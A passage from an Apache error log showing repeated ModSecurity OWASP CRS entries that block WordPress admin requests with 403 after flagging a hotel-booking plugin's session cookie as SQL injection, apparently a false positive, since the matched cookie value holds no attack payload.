"/wp-admin/edit.php"] [unique_id "agIFrFV4kyjgo4bQBUiCZQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:00.232773 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFrFV4kyjgo4bQBUiCZQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:00.843106 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFrFV4kyjgo4bQBUiCZQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:01.341150 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFrVV4kyjgo4bQBUiCZgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:01.341442 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFrVV4kyjgo4bQBUiCZgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:01.960797 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFrVV4kyjgo4bQBUiCZgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:02.432782 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFrlV4kyjgo4bQBUiCaQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:02.433066 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFrlV4kyjgo4bQBUiCaQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:03.005430 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFrlV4kyjgo4bQBUiCaQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:03.227451 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFr1V4kyjgo4bQBUiCagAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:03.227727 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFr1V4kyjgo4bQBUiCagAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:03.795822 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFr1V4kyjgo4bQBUiCagAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:04.008839 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFsFV4kyjgo4bQBUiCbAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:04.009124 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFsFV4kyjgo4bQBUiCbAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:04.378775 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFsFV4kyjgo4bQBUiCbAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:04.940583 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFsFV4kyjgo4bQBUiCbQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:04.940860 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFsFV4kyjgo4bQBUiCbQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:05.578280 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFsFV4kyjgo4bQBUiCbQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:05.939439 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFsVV4kyjgo4bQBUiCbwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:05.939721 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFsVV4kyjgo4bQBUiCbwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:06.553733 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFsVV4kyjgo4bQBUiCbwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:06.934963 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFslV4kyjgo4bQBUiCcAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:06.935255 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFslV4kyjgo4bQBUiCcAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:07.543645 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFslV4kyjgo4bQBUiCcAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:07.854687 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFs1V4kyjgo4bQBUiCcgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:07.854971 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFs1V4kyjgo4bQBUiCcgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:08.447457 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFs1V4kyjgo4bQBUiCcgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:08.592270 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFtFV4kyjgo4bQBUiCcwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:08.592556 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFtFV4kyjgo4bQBUiCcwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:09.214287 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFtFV4kyjgo4bQBUiCcwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:09.401196 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFtVV4kyjgo4bQBUiCdQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:09.401632 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFtVV4kyjgo4bQBUiCdQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:09.780870 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFtVV4kyjgo4bQBUiCdQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:10.260171 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFtlV4kyjgo4bQBUiCdwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:10.260474 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFtlV4kyjgo4bQBUiCdwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:10.874993 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFtlV4kyjgo4bQBUiCdwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:11.152374 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri 